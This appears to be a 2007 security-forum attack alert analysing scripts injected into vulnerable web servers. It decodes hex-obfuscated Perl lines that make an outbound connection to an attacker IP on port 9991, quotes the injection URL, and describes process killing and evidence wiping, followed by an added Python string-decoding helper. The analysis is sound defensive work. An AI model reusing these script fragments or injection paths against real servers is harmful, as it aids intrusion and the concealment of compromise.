Paul
CastleCops Founder
Joined: Feb 22, 2002 Posts: 27351
Posted: Thu Nov 29, 2007 2:35 am Post subject: [WsIRT#233] Daemon Termination, Evidence Elimination, id Dis
Attack Alert Full Report: /Daemon_Termination_Evidence_Elimination_id_Disclosure_attack233.html
Changed status to confirmed attack.
IP Converted: 203.166.138.154
dword = 3416689306
hex1 = 0xcba68a9a
hex2 = 0xcb.0xa6.0x8a.0x9a
oct = 0313.0246.0212.0232
217.72.76.70 is the translated value of the bc.txt entry for:
my $target = inet_aton("\x32\x31\x37\x2e\x37\x32\x2e\x37\x36\x2e\x37\x30\x20");
Which has a reverse lookup of ns2.poglej.com.
IP Converted: 217.72.76.70
dword = 3645393990
hex1 = 0xd9484c46
hex2 = 0xd9.0x48.0x4c.0x46
oct = 0331.0110.0114.0106
View CIDR AS10031 Report: http://www.cidr-report.org/cgi-bin/as-report?as=10031
"10031 | SG | apnic | 2000-06-15 | IASPIRE-ASN iASPire.net Pte Ltd"
Extended information for AS10031:
State/Province:
Country: au
Responsible Domain: apnic.net
Abuse Email: abuse*disable*@apnic.net
The port connection is 9991, translated from:
$port = "\x39\x39\x39\x31";
View CIDR AS16016 Report: http://www.cidr-report.org/cgi-bin/as-report?as=16016
"16016 | SI | ripencc | 2000-11-24 | VOLJATEL-AS VOLJATEL Autonomous System"
Extended information for AS16016:
State/Province:
Country: si
Responsible Domain: voljatel.si
Abuse Email: postmaster@voljatel.si
Those values are hexadecimal before translation. The st and bc.txt scripts are being used to inject into remote exploitable web servers in order to determine how far that remote server can be compromised. Both scripts kill remote server processes like php and inetd, and then attempt to clean up any evidence they left behind. The second script attempts to TCP connect to 217.72.76.70 on port 9991, but a check of that system doesn't reveal an open port (via a telnet or curl attempt).
Quote: http://203.166.138.154/manual/vhosts/.,/st?
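For analysts unpicking strings like the two quoted in the post, an added Python example (not from the post or from the scripts it describes) that decodes \xNN-escaped Perl literals and reproduces the dword / hex / octal notations shown in the report. The script fragment it parses is constructed to match the two lines quoted above; the trailing \x20 in the target string is the edge case the stripping step handles.

```python
import re
import struct

# Constructed fragment modelled on the two hex-escaped Perl lines quoted in the post
# (not the actual st / bc.txt scripts).
SAMPLE_SCRIPT = r'''
my $target = inet_aton("\x32\x31\x37\x2e\x37\x32\x2e\x37\x36\x2e\x37\x30\x20");
$port = "\x39\x39\x39\x31";
'''

# A double-quoted literal made entirely of \xNN escapes.
ESCAPED_STRING = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')


def decode_hex_escapes(s):
    """Turn a run of \\xNN escapes into the text it hides."""
    return bytes.fromhex(s.replace("\\x", "")).decode("latin-1")


def extract_obfuscated_strings(script):
    """Every fully escaped literal in the script, decoded and whitespace-stripped.
    The quoted target ends in \\x20 (a space); stripping keeps it parseable as an IP."""
    return [decode_hex_escapes(m.group(1)).strip() for m in ESCAPED_STRING.finditer(script)]


def ip_representations(dotted):
    """dword, 32-bit hex, per-octet hex and per-octet octal, as in the alert report."""
    octets = [int(o) for o in dotted.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError("not a dotted-quad IPv4 address: %r" % dotted)
    dword = struct.unpack("!I", bytes(octets))[0]  # network byte order
    return {
        "dword": dword,
        "hex1": "0x%08x" % dword,
        "hex2": ".".join("0x%02x" % o for o in octets),
        "oct": ".".join("0%o" % o for o in octets),
    }


def decoded_ip_targets(script):
    """Decoded literals that parse as IPv4 addresses, with their alternate notations."""
    targets = {}
    for literal in extract_obfuscated_strings(script):
        try:
            targets[literal] = ip_representations(literal)
        except ValueError:
            continue  # e.g. the port string "9991" is not an address
    return targets


if __name__ == "__main__":
    for ip, forms in decoded_ip_targets(SAMPLE_SCRIPT).items():
        print(ip, forms)
```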